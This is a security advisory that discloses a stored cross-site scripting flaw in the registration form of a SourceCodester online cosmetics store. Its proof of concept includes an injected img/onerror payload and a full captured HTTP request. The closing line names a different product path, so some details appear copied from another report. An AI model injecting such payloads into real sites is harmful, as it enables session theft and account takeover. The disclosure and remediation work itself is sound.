Stored Cross-Site Scripting Vulnerability in SourceCodester Cosmetics and Beauty Product Online Store - 1.0 :
Vendor: Sourcecodester
Product: Cosmetics and Beauty Product Online Store - 1.0
Product URL: Cosmetics and Beauty Product Online Store - 1.0
Executive Summary
Stored Cross-Site Scripting (SXSS) vulnerability in Cosmetics and Beauty Product Online Store - 1.0 and earlier allows attacker to inject the Malicious JavaScript Code in the "First Name" input field. The malicious code can then be executed whenever the vulnerable web page is accessed by any user, staff or even admin and will remain persistent. It will eventually result in account takeover as the session cookies can be accessed by the malicious JavaScript Code. Issue Details
Vulnerability Name: Stored XSS in First Name
Severity: High
Affected URL: http://localhost/cbpos/classes/Master.php?f=register
Affected Parameter: First Name
HTTP Method: POST
Issue Description
The web application is vulnerable to Cross-Site Scripting (SXSS) attacks in the "First Name" input field. An attacker can exploit this vulnerability by inputting the malicious JavaScript code in the HTTP POST request to create the user. In the provided example, the attacker modifies the "First Name" parameter to insert a malicious JavaScript Code that can also access the authentication cookies. Proof Of Concept
Configure a web proxy in your browser.
Navigate to the URL in the browser http://localhost/cbpos/classes/Master.php?f=register
Fill in the desired data in the input fields. Intercept the request in the web proxy. Modify the First name parameter as shown below and send the request to the server.
firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40In the browser just create an account and navigate to homepage
https://drive.google.com/file/d/1ZoSWqudhD-uPAmaU_E04IMSdm7VBI_fu/view?usp=drive_link Payload:
firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40
Request:
POST /cbpos/classes/Master.php?f=register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 227
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://localhost/cbpos/
Cookie: PHPSESSID=p74o2f7lqfitvojtejdnshjrau; __insuarance__logged=1; __insuarance__key=7273YL1ZQOZ448QSLS6V
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40Impact:
Stored XSS attacks can have serious consequences, such as Account takeover by stealing cookies, stealing sensitive data, modifying the content of the web page, or redirecting users to a malicious sites. Remediation:
Implement proper input validation and output encoding to prevent malicious code from being injected into the web application. Use server-side validation to ensure that user input is properly sanitized before being stored in a database or displayed on a web page. Use output encoding to ensure that any user input that is displayed on the web page is properly encoded to prevent malicious code from being executed. References:
https://portswigger.net/web-security/cross-site-scripting/stored
https://owasp.org/www-community/attacks/xss/
Weakness Enumeration:
CWE-79
This report highlights the Stored XSS vulnerability present in the First name parameter of http://localhost/e-insurance/Script./core/new_account, including the Proof of Concept, its impact, remediation steps and references for further guidance on mitigation strategies.